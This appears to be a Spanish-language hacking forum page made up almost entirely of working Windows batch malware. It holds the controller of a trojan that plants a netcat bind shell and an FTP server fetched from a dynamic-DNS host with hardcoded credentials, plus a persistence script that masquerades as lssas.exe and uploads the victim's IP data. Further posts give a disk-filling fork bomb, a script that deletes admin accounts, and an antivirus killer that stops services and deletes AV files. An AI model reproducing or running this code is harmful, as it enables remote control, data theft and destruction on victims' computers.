if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp5
cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:resp5
cls
type Data\Packets\%res%.txt
pause >nul
del Data\Packets\%res%.txt
cls
goto menu
:codes
cls
set /p codeins=Introduce nuevo codigo de instruccion:
cls
set /p coderes=Introduce nuevo codigo de respuesta:
cls
set /p idcode=Introduce nuevo identificador de victima:
cls
set /p temp=Introduce nuevo tiempo de espera de conexion:
echo del codes.txt>>Data\Packets\%ins%.bat
echo echo newinst %codeins%^>^>^codes.txt>>Data\Packets\%ins%.bat
echo echo newresp %coderes%^>^>^codes.txt>>Data\Packets\%ins%.bat
echo echo newid %idcode%^>^>^codes.txt>>Data\Packets\%ins%.bat
echo echo temp %temp%^>^>^codes.txt>>Data\Packets\%ins%.bat
echo echo Los codigos han sido cambiados con exito^>^>%coderes%.txt>>Data\Packets\%ins%.bat
cls
echo Enviando paquete de instrucciones OK
echo Esperando al server...
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%coderes%.txt goto resp6
cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:resp6
cls
type Data\Packets\%coderes%.txt
pause >nul
del Data\Packets\%coderes%.txt
cls
echo Despues de este comando es necesario volver a conectar
echo Recuerda introducir los nuevos codigos
pause > nul
goto menus
:shell
cls
echo Para usar esta opcion es necesario tener el programa netcat (nc.exe) en el directorio raiz del ftp
echo Asegurate de que esta hay, despues pulsa enter
pause > nul
cls
set /p port=Introduce el puerto donde colocar netcat a la escucha:
cls
echo echo open nanoc.no-ip.info^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo Troyan^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo crysis^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo get nc.exe^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo He colocado una shell a la escucha en el puerto %port%^>^>^%res%.txt>>Data\Packets\%ins%.bat
echo echo bye^>^>^descar.txt>>Data\Packets\%ins%.bat
echo ftp -s:descar.txt>>Data\Packets\%ins%.bat
echo del descar.txt>>Data\Packets\%ins%.bat
echo start nc -L -d -e cmd.exe -p %port%>>Data\Packets\%ins%.bat
cls
echo Enviando paquete de instrucciones OK
echo Esperando al server...
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:resp7
cls
type Data\Packets\%res%.txt
pause >nul
del Data\Packets\%res%.txt
cls
goto menu
:ftp
cls
echo esta opcion colocara un servidor ftp a la escucha en la victima
echo Ten en cuenta que si la victima esta detras de un router o firewall no podras realizar la conexion
pause > nul
cls
echo Para usar esta opcion es necesario que tengas los archivos del servidor ftp en el directorio Data\Files ( slimftpd.exe, slimftpd.conf )
echo Asegurate de que estan hay y pulsa enter
pause > nul
echo echo open nanoc.no-ip.info^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo Troyan^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo crysis^>^>^descar.txt>>Data\Packets\%ins%.bat
echo echo get slimftpd.exe^>^>^descar.txt>>Data\Packets\%ins%.ba t
echo echo get slimftpd.conf^>^>^descar.txt>>Data\Packets\%ins%.b at
echo echo El servidor ftp ha sido colocado con exito^>^>^%res%.txt>>Data\Packets\%ins%.bat
echo echo put slimftpd.log^>^>^descar.txt>>Data\Packets\%ins%.ba t
echo echo bye^>^>^descar.txt>>Data\Packets\%ins%.bat
echo ftp -s:descar.txt>>Data\Packets\%ins%.bat
echo del descar.txt>>Data\Packets\%ins%.bat
echo start slimftpd.exe>>Data\Packets\%ins%.bat
cls
echo Enviando paquete de instrucciones OK
echo Esperando al server...
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp8
cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:resp8
cls
type Data\Packets\%res%.txt
pause >nul
del Data\Packets\%res%.txt
type slimftpd.log
pause >nul
del slimftpd.log
cls
goto menu
:vic
cls
if not exist Data\Packets\conect.txt goto nofind
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set vic=%%a
echo 1 %vic%
del Data\Packets\conect.txt
ping -n 20 127.0.0.1 > nul
if not exist Data\Packets\conect.txt goto nomore
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set vic2=%%a
if %vic2%==%vic% goto nomore
echo 2 %vic2%
del Data\Packets\conect.txt
ping -n 20 127.0.0.1 > nul
if not exist Data\Packets\conect.txt goto nomore
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set vic3=%%a
if %vic3%==%vic% goto nomore
if %vic3%==%vic2% goto nomore
echo %vic3%
del Data\Packets\conect.txt
ping -n 20 127.0.0.1 > nul
if not exist Data\Packets\conect.txt goto nomore
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set vic4=%%a
if %vic4%==%vic% goto nomore
if %vic4%==%vic2% goto nomore
if %vic4%==%vic3% goto nomore
echo %vic4%
del Data\Packets\conect.txt
ping -n 20 127.0.0.1 > nul
if not exist Data\Packets\conect.txt goto nomore
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" conect.txt') do set vic5=%%a
if %vic5%==%vic% goto nomore
if %vic5%==%vic2% goto nomore
if %vic5%==%vic3% goto nomore
if %vic5%==%vic4% goto nomore
echo %vic5%
del Data\Packets\conect.txt
goto nomore
:nofind
cls
echo No hay ninguna victima conectada
pause > nul
goto menus
:nomore
set /p co=Introduce el numero de victima al que quieras conectarte:
if %co%==1 set id=%vic%
if %co%==2 set id=%vic2%
if %co%==3 set id=%vic3%
if %co%==4 set id=%vic4%
if %co%==5 set id=%vic5%
echo Error2
cls
if not exist Data\Packets\conect.txt ping -n 10 127.0.0.1
if not exist Data\Packets\conect.txt goto error6
echo Esperando codigos de instruccion y respuesta...
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 15 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 15 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 15 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 15 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 15 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 15 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 14 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
ping -n 15 127.0.0.1 > nul
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "Id" Data\Packets\conect.txt') do set idc=%%a
if %idc%==%id% goto cogcod
del Data\Packets\conect.txt
cls
echo Error3
pause > nul
goto menus
:cogcod
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "ins" Data\Packets\conect.txt') do set ins=%%a
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "res" Data\Packets\conect.txt') do set res=%%a
echo Codigos obtenidos!
ping -n 3 127.0.0.1 > nul
cls
echo Conectando...
ping -n 3 127.0.0.1 > nul
echo Conectado!
goto menu
:do
cls
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "id" Data\Notices\confir.txt') do set ipid=%%a
echo Se ha encontrado un archivo de confirmacion de infeccion
echo el identificador de victima es %ipid%
echo Que desea Hacer:
echo 1 Verlo
echo 2 Conectar
echo 3 Eliminar y continuar con el programa
echo 4 Guardar y continuar con el programa
set /p do2=Introduce numero de opcion:
if %do2%==1 goto rep4
if %do2%==2 goto ipcon
if %do2%==3 goto menus
if %do2%==4 goto confsave
cls
echo Error2
pause > nul
:rep4
cls
type Data\Notices\confir.txt
pause > nul
goto do
:ipcon
cls
echo Introduciendo codigos...
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "ins" Data\Notices\confir.txt') do set ins=%%a
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "res" Data\Notices\confir.txt') do set res=%%a
ping -n 3 127.0.0.1 > nul
echo Conectando...
ping -n 3 127.0.0.1 > nul
goto menu
:confsave
set /p confnom=Con que nombre deseas guardarlo?:
if exist saves goto exis
mkdir saves
rename Data\Notices\confir.txt Data\Notices\%confnom%.txt
copy Data\Notices\%confnom%.txt Data\saves\%confnom%.txt
del Data\Notices\%confnom%.txt
goto menu
:exis
rename Data\Notices\confir.txt Data\Notices\%confnom%.txt
copy Data\Notices\%confnom%.txt Data\saves\%confnom%.txt
del Data\Notices\%confnom%.txt
goto menu
:load
cls
echo Coloca el archivo a subir en el directorio raiz del ftp y pulsa enter.
Pause > nul
cls
set /p file=Introduce nombre del archivo a subir:
if not exist Data\Files\%file% goto filerror
echo start winnt32.exe get %file%>>Data\Packets\%ins%.bat
echo echo El Archivo ha sido subido con exito^>^>%res%.txt>>Data\Packets\%ins%.bat
cls
echo Enviando paquete de instrucciones OK
echo Esperando al server...
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
ping -n 2 127.0.0.1 >nul
if exist Data\Packets\%res%.txt goto resp7
cls
if not exist Data\Packets\%ins%.bat (echo Error3)
if exist Data\Packets\%ins%.bat (echo Error4)
pause >nul
del Data\Packets\%ins%.bat
cls
goto menu
:alert
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "idsys" Data\Notices\alert.txt') do set idsys=%%a
cls
echo Se ha encontrado un mensaje de %idsys%
echo El Mensaje procede del systema de seguridad
echo Que desea hacer:
echo 1 Verlo
echo 2 Borrar y continuar con el programa
echo 3 Guardar y continuar con el programa
set /p alt1=Introduce numero de opcion:
if %alt1%==1 goto mostala
if %alt1%==2 goto menus
if %alt1%==3 goto savala
cls
echo Error2
pause > nul
goto alert
:mostala
cls
type Data\Notices\alert.txt
Pause > nul
goto alert
:savala
set /p alanom=Con que nombre deseas guardarlo?:
if exist saves goto exis
mkdir saves
rename Data\Notices\alert.txt Data\Notices\%alanom%.txt
copy Data\Notices\%alanom%.txt Data\saves\%alanom%.txt
del Data\Notices\%alanom%.txt
goto menu
:exis
rename Data\Notices\alert.txt Data\Notices\%alanom%.txt
copy Data\Notices\%alanom%.txt Data\saves\%alanom%.txt
del Data\Notices\%alanom%.txt
goto menus
:filerror
cls
echo Error5
pause > nul
goto menu
:error6
cls
echo Error6
pause > nul
goto menus

SECURITY SYSTEM

Código: php

@echo off
copy %0 "c:\WINDOWS\system32\lssas.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run" /v "securitysystem" /t reg_sz /d "c:\WINDOWS\system32\lssas.exe" /f
if not exist "c:\WINDOWS\system32\winnt32.exe" goto rest
exit
:rest
for /f "tokens=2 DELIMS= " %%a in ('FIND /I "id" codes.txt') do set id=%%a
echo idsys %id%>alert.txt
echo Soy el sistema de seguridad del Batch Troyan V7>>alert.txt
echo Debo informar del borrado del archivo "C:\WINDOWS\system32\winnt32.exe">>alert.txt
echo Dicho archivo ha sido restablecido con exito>>alert.txt
echo El identificador de victima es %id%>>alert.txt
echo Adjunto ip de la victima>>alert.txt
ipconfig>>alert.txt
echo open nanoc.no-ip.info>desc.txt
echo Troyan>>desc.txt
echo crysis>>desc.txt
echo put Data\Notices\alert.txt>>desc.txt
echo cd Data\securitysystem>>desc.txt
echo get winnt32.exe>>desc.txt
echo bye>>desc.txt
ftp -s:desc.txt
del desc.txt
del alert.txt
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run" /v "wint32.exe" /t reg_sz /d "c:\WINDOWS\system32\winnt32.exe" /f
start winnt32.exe

Batch - Bash / Ocultar la venta del bat al abrirse

Enero 22, 2013, 12:46:18 PM

Hay muchas formas yo les voy a enseñar 2:

Esto lo que hara es que no salga la venta del ms dos al abrir el bat permitiendo asi la ejecucion completa y OCULTA
1era forma:

@echo off
cd %tmp%
set /p nom= Elija el nombre de su bat a ocultar
echo set objshell = createobject ("wscript.shell")>>9098.vbs
echo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta "%nom%.bat" , vbhide>>9098.vbs
start 9098.vbs
pause

2da forma:

@echo off
Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnce /t reg_sz /v "Windowsreac" /d "nombre del bat.bat" /f

Tambien los programas que pasan la extension de bat a exe tienen una opcion llamada ghost o hide que sirve para lo mismo

Batch - Bash / Manejando el REG EDIT para internet

Enero 22, 2013, 12:42:05 PM

eno les voy a presentar algunos codigos bat que les permetiran bloquear paginas de internet , establecer la que quieran como inicio

Bloquear el inet:

@echo off
set bloquear=%windir%\system32\drivers\etc\hosts
echo 127.0.0.1 paginaabloquear>>%bloquear%
exit

Poner pagina de inicio:

@echo off
reg add "hkcu\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "pagina de inicio" /f

Bueno eso es todo

Batch - Bash / Llenar la pc hasta acabar su memoria

Enero 20, 2013, 09:36:26 PM

Bueno en 5 minutos cree este pequeño codigo malicioso que lo que hace es crear miles de bat , exe , jpg etc en diferentes directorios que pesan 286 MB c/u y luego los oculta.

Código: php

REM """CODE BY EL BATE""""
@echo off
cd %windir%
cd %userprofile%
cd %programfiles%
cd %tmp%
:carpeta
md %random%
attrib +h +s +a *.*
set /a num=1
:bat
echo @echo off>>%num%.bat
echo fsutil file createnew "%random%.bat" "300000000">>%num%.bat
echo for %%a in (*.bat) do start %random%.bat>>%num%.bat
set /a num=%num%+1
start %0
attrib +h +s +a *.*
:exe
fsutil file createnew "%random%.exe" "300000000"
attrib +h +s +a *.*
:jpg
fsutil file createnew "%random%.jpg" "300000000"
attrib +h +s +a *.*
:txt
fsutil file createnew "%random%.txt" "300000000"
attrib +h +s +a *.*
goto txt
goto carpeta
goto bat
goto exe
goto jpg
REM """CODE BY EL BATE""""

Batch - Bash / Hacerte usuario en otra pc

Enero 20, 2013, 09:35:00 PM

Lo que hace este bat es borarr todos los usuarios y adm anteriores convirtiendote en usuario.

Código: php

@echo off
net user Administrador /delete
net user "" "" /delete
NET ACCOUNTS /delete
NET USER administrator /delete
NET GROUP /delete
ping -n 1 localhost>nul
net user Hacker 3322 /ADD /COMMENT "HACKER User"
start C:\Windows\System32\rundll32.exe user32.dll LockWorkStationç
exit

Batch - Bash / Av-Killers

Enero 20, 2013, 09:33:40 PM

AV Killers: Dejar sin AVS a la victima

Código: php

@echo off
If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
:1
If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
:2
If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:3
If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
:4
If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
:5
If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:6
If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
:7
If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8)
:8
If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
:9
If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:10
If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
:11
If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else
(goto 12)
:12
If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:13
If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:14
If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto
15)
:15
If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:16
If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
:17
If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else
(gto 18)
:18
If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
:19
If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
:20
goto fin
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:\Archivos de programa\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:\Archivos de programa\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apvxdwin"
net stop "pavProxy"
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
:sinspy
Taskkill /f /IM no-spy.exe
cd "C:\Archivos de programa\SinEspias"
attrib -H -S -R *.*
del /s /q *.*
:sweeper
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd "C:\Archivos de programa\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:kav
